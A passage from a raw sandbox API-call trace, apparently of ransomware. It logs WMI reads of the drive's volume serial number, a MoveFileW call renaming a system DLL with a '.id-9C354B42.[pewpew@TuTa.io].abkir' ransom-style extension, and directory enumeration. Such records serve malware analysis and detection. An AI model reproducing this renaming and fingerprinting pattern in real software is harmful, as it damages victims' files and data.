[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5a934) returned 0x0 [0207.866] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a934, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.866] WbemLocator:IUnknown:Release (This=0xb5a934) returned 0x3 [0207.866] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0207.866] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0207.866] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5a9bc) returned 0x0 [0207.866] WbemLocator:IRpcOptions:Query (in: This=0xb5a9bc, pPrx=0xb5a9d4, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0207.866] WbemLocator:IUnknown:Release (This=0xb5a9bc) returned 0x3 [0207.866] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0207.866] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0207.866] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0207.866] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x60332c4) returned 0x0 [0207.866] WbemLocator:IUnknown:AddRef (This=0x60332c4) returned 0x4 [0207.866] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x3 [0207.866] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x2 [0207.866] SysStringLen (param_1=0x0) returned 0x0 [0207.866] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0207.866] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0207.866] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.866] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0207.866] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0207.866] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5a9d4) returned 0x0 [0207.866] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x3 [0207.867] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0207.867] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0207.867] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.867] IWbemServices:GetObject (in: This=0x60332c4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0208.112] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0208.112] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0208.112] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.112] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3663ef8*=0, plFlavor=0x3663efc*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3663ef8*=8, plFlavor=0x3663efc*=0) returned 0x0 [0208.113] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.113] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.113] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3663ef8*=8, plFlavor=0x3663efc*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3663ef8*=8, plFlavor=0x3663efc*=0) returned 0x0 [0208.113] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.113] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", lpFilePart=0x0) returned 0x40 [0208.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x63 [0208.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0208.113] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35561f80, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0208.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0208.113] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0208.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0208.114] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", lpFilePart=0x0) returned 0x32 [0208.114] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpFilePart=0x0) returned 0x33 [0208.114] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f590 [0208.114] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c92176b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c92176b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xdd6ec0f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConvertInkStore.exe", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0208.116] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0208.116] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0208.116] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0208.116] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0208.116] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0208.116] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0208.116] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0208.117] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c53a9c4, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5c53a9c4, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe29c9700, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0208.117] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0208.117] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0208.117] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0208.117] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0208.117] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ece8572, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2ece8572, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2ea60e45, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7eaa54, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2f7eaa54, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2f301d57, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb6710, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenalm.dat", cAlternateFileName="")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33535c00, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x33535c00, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x332fa78d, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xc7240, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd661d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x32bd661d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x32a7f9d8, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x10ca50, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94dbb3, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3d94dbb3, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3c28ab1e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x2e99a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruklm.dat", cAlternateFileName="")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da5853e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3da5853e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d7f6f6e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x21ff00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruksh.dat", cAlternateFileName="")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db89026, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3db89026, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d3cc942, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x30c330, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dbfb43d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3dbfb43d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3da7e69b, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x3ee0d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0xb7f590, 